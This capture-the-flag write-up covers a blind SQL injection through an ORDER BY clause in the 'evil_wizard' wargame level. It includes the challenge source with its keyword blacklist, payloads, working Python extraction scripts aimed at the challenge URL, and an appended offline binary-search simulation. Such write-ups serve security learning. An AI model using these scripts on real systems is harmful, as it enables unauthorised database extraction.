
LORD OF SQLINJECTION : evil_wizard

Write-Up

 

  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");

 

This challenge is very similar to the previous one, hell_fire, and I solved it with the same exploit. Looking at the code, the one difference from the previous challenge is that the blacklist now also covers sleep() and benchmark(), so time-based blind injection is off the table. Everything else is unchanged: the order parameter goes into the ORDER BY clause unquoted and unescaped, and admin's email is masked in the rendered table, so the value has to be leaked through a boolean oracle on the row order (whether the admin row comes first or not).

 

Let's work through it!

 

[ Using a CASE WHEN expression ]
?order= CASE%20WHEN%20length(email)%20>20%20THEN%200%20ELSE%201%20END;

[ Using if() ]
?order= if(id=%27admin%27%20and%20length(email)=30,%20%271%20ASC%27,%20%271%20DESC%27)

 

Both payloads above produced distinguishable true/false responses: when the condition holds, the admin row sorts to the top of the table. So the first step is to recover the length of the email as follows.

 

 

Email length

import requests

# ORDER BY CASE WHEN length(email) = i THEN 0 ELSE 1 END
# -> the admin row (the only one whose length matches) sorts first when i is right.
url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order= CASE WHEN length(email) = "
cookies = {'PHPSESSID': "keogb0hg2e84st5u0ejgaa33d8"}

# Rendered table when admin is the first row (email masked, score 50).
admin_first = "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td><td>**************</td><td>50</td></tr>"

for i in range(1, 40):
    param = str(i) + " THEN 0 ELSE 1 END;"

    URL = url + param
    print(URL)
    response = requests.get(URL, cookies=cookies)
    if admin_first in response.text:
        print(i)
        break

 

?order= CASE WHEN length(email) = 30 THEN 0 ELSE 1 END;

 

The email is 30 characters long.

 

Now let's recover the email value itself with the code below.

 

Recovering the email value

import requests

# ORDER BY CASE WHEN ascii(substr(email,i,1)) = j THEN 0
#               WHEN length(email) < 30 THEN 1 ELSE 2 END
# -> admin (length 30) gets 0 only when the guessed character is right,
#    shorter emails get 1, so admin sorts first exactly on a hit.
url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=CASE WHEN ascii(substr(email,"
cookies = {'PHPSESSID': "keogb0hg2e84st5u0ejgaa33d8"}

# Rendered table when admin is the first row (email masked, score 50).
admin_first = "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td><td>**************</td><td>50</td></tr>"

result = ""
for i in range(1, 31):              # 30 characters, substr() is 1-indexed
    for j in range(32, 127):        # printable ASCII
        param = str(i) + ",1))=" + str(j) + " THEN 0 WHEN length(email) <30 THEN 1 ELSE 2 END;"
        URL = url + param
        # print(URL)
        response = requests.get(URL, cookies=cookies)
        if admin_first in response.text:
            result += chr(j)
            print(i, " : ", result)
            break
print("email: " + result)

 

 

Figure 1
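As an added example (not part of the original write-up), the same ORDER BY oracle from the length and character-recovery steps above, but run offline against an in-memory SQLite stand-in for prob_evil_wizard and driven by a binary search instead of a linear scan. The sample rows and the admin email are constructed values, not the real table. Two things differ from the scripts above on purpose: the CASE sends admin to the bottom (key 2) when the condition is false, so a false answer never leaves a tie whose order the DBMS may resolve arbitrarily, and the char-code function is parameterised because SQLite has unicode() where MySQL has ascii().

```python
import re
import sqlite3

# Constructed stand-in rows; the admin email is made up, not the real flag.
SAMPLE_ROWS = [
    ("admin", "wizard@example.com", 50),
    ("rubiya", "rubiya@example.com", 99),
    ("guest", "guest@example.com", 1),
]

# The blacklist the challenge applies to $_GET[order].
ORDER_FILTER = re.compile(r"prob|_|\.|proc|union|sleep|benchmark", re.I)

# SQLite: unicode(); MySQL: ascii(). Neither name trips the filter.
CHARCODE_FN = "unicode"


class Target:
    """In-memory simulation of the vulnerable page (constructed, not the real site)."""

    def __init__(self, rows):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("create table prob_evil_wizard(id text, email text, score int)")
        self.conn.executemany("insert into prob_evil_wizard values (?,?,?)", rows)
        self.requests = 0

    def order_by(self, order_expr):
        """One 'request': True if the admin row would be rendered first."""
        self.requests += 1
        if ORDER_FILTER.search(order_expr):
            raise ValueError("No Hack ~_~")
        query = f"select id,email,score from prob_evil_wizard where 1 order by {order_expr}"
        first = self.conn.execute(query).fetchone()
        return first is not None and first[0] == "admin"


def probe(target, cond):
    # admin -> 0 when cond holds, 2 otherwise; every other row -> 1.
    # A false answer therefore moves admin last instead of leaving a tie.
    expr = f"CASE WHEN id='admin' AND {cond} THEN 0 WHEN id='admin' THEN 2 ELSE 1 END"
    return target.order_by(expr)


def bsearch(target, tmpl, lo, hi):
    """Smallest v in [lo, hi] for which tmpl.format(v) (a '<= v' test) is true."""
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(target, tmpl.format(mid)):
            hi = mid
        else:
            lo = mid + 1
    return lo


def find_length(target, max_len=64):
    return bsearch(target, "length(email) <= {}", 1, max_len)


def extract_email(target):
    n = find_length(target)
    chars = []
    for i in range(1, n + 1):  # substr() is 1-indexed, as in MySQL
        code = bsearch(target, f"{CHARCODE_FN}(substr(email,{i},1)) <= {{}}", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    t = Target(SAMPLE_ROWS)
    print("email:", extract_email(t), "in", t.requests, "requests")
```

With 6 probes for the length (range 1..64) and at most 7 per character (codes 32..126), a 30-character email costs about 216 requests instead of the 2,800-odd a full linear scan can take. To point this at the real challenge, replace Target.order_by with an HTTP GET and the same admin-first substring check the scripts above use, and set CHARCODE_FN to "ascii".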